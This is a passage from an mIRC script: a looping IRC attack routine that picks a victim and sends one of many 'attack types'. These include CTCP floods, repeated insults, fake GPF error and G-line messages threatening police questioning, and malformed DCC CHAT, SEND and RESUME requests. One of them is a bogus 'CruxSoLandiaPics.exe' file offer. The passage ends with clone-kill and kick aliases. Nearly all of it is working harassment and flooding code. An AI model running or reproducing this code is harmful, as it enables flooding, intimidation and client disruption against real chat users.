/ctcp %attackvictim time | /goto end } n749=if (%attacktype == atpong) { /ctcp %attackvictim pong | /goto end } n750=if (%attacktype == atlamer) { /ctcp %attackvictim echo $str(50,LAMERLamer) | /goto end } n751=if (%attacktype == atflood) { /ctcp %attackvictim echo $str(40,âFlodâFloodâFlooodâFloooodâ) | /goto end } n752=if (%attacktype == aterror) { /ctcp %attackvictim echo $str(80,â╗⌐«⌐ERROR½â) | /goto end } n753=if (%attacktype == atshare) { /ctcp %attackvictim echo $str(30,âThis mIRC Version is not Registered«â) | /goto end } n754=if (%attacktype == atdevil) { /ctcp %attackvictim echo $str(70,â╗«⌐DeviL«⌐½â) | /goto end } n755=if (%attacktype == athell) { /ctcp %attackvictim echo $str(50,âSee Ya in HellâI'm The DeviLâ) | /goto end } n756=if (%attacktype == atface) { /raw notice %attackvictim : $+ DEVIL Now You'll see the face of the $+ $str(40, %devill) $+ | /goto end } n757=:2 n758=if (%attacktype == atctcpcombo1) { /ctcp %attackvictim version | /ctcp %attackvictim clientinfo | /ctcp %attackvictim echo $str(15,DeviL) | /ctcp %attackvictim ping | /ctcp %attackvictim time | /goto end } n759=if (%attacktype == atctcpcombo2) { /ctcp %attackvictim clientinfo | /ctcp %attackvictim usertinfo | /ctcp %attackvictim echo $str(7, See ya in Hell, I'm the DeviL ) | /ctcp %attackvictim errmsg $str(5, General Protection Fault Error [GPF] ) | /ctcp %attackvictim echo $str(8, ⌐«⌐ ú««╪« ) | /goto end } n760=if (%attacktype == atultracombo1) { /ctcp %attackvictim echo $str(10, GPF Protection Fault ) | /invite %attackvictim #asdasdasdkasldka $+ $chr(160) $+ a | /msg %attackvictim $str(8, See ya in Hell. I'm the DeviL ) | /raw privmsg %attackvictim :DCC CHAT blah 3353362454 19 blah $+ | /raw privmsg %attackvictim :DCC SEND $rand(a,z) 3371822594 19 $rand(0,9999999999) | /goto end } n761=if (%attacktype == atdevecho) { /ctcp %attackvictim echo / DDDDDDD EEEEEEE V V II LL \ | /ctcp %attackvictim echo [ D DD EE V V II LL ] | /ctcp %attackvictim echo [ D DD EE V V II LL ] | /ctcp %attackvictim echo [ D DD EEEEE V V II LL ] | /ctcp %attackvictim echo [ D DD EE V V II LL ] | /ctcp %attackvictim echo [ D DD EE V V II LL ] | /ctcp %attackvictim echo [ D DD EE V V II LL ] | /ctcp %attackvictim echo \ DDDDDDD EEEEEEE V II LLLLLLL / | /goto end } n762=if (%attacktype == atfakereply) { /raw notice %attackvictim : $+ DEVIL $+ $str(30,%devill) $+ | /goto end } n763=if (%attacktype == atversion) { /ctcp %attackvictim version | /goto end } n764=if (%attacktype == atclientinfo) { /ctcp %attackvictim clientinfo | /goto end } n765=if (%attacktype == atuserinfo) { /ctcp %attackvictim userinfo | /goto end } n766=if (%attacktype == atfinger) { /ctcp %attackvictim finger | /goto end } n767=if (%attacktype == athalibut) { /ctcp %attackvictim halibut | /goto end } n768=if (%attacktype == atdccchat) { /raw privmsg %attackvictim :âDCC CHAT 1 1 1 1â | /goto end } n769=if (%attacktype == atdccsend) { /raw privmsg %attackvictim :âDCC SEND CruxSoLandiaPics.exe Pentium.Microsoft.Com 666 1024102400â | /goto end } n770=if (%attacktype == atdccresume) { /raw privmsg %attackvictim :DCC RESUME i.hate.you 34254 435342 345435 | /goto end } n771=if (%attacktype == atfuckyou) { /ctcp %attackvictim echo $str(50,âFuckYouâ) | /goto end } n772=if (%attacktype == atserverkick) { /ctcp %attackvictim echo $str(10,âYou Were Kicked From The Server. The IRC Ops Want You Out This Server. You Aren't Welcome Hereâ) $+ âYou Have Been Marked As G-Lined. You Are Not Welcome On This Server AnymoreâSome COPs Will Ask You About Your Hacking ActivitiesâEâECâECH | /goto end } n773=if (%attacktype == atnopain) { /ctcp %attackvictim echo $str(40,âNo Pain, No Gainâ) $+ Ok, You Won, Kisses Kisses And Bye Byeâ | /goto end } n774=if (%attacktype == athahaha) { /ctcp %attackvictim echo $str(30,âHAHAHAhahahaâ) | /goto end } n775=:end n776=inc %attacks n777=if %attacks < %attacktimes { goto attack } n778=} n779=F10 /nick _ $+ $rand(0,9) $+ Carlos $+ $rand(0,9) n780=/ipkill { n781= set %killmsg Clones cleaning services... n782= /enable #ipkiller n783= /who $$1 n784=} n785=/ipkiker { n786= set %kickmsg Cleaning services... n787= /enable #ipkiker n788= /who $$1 n789=}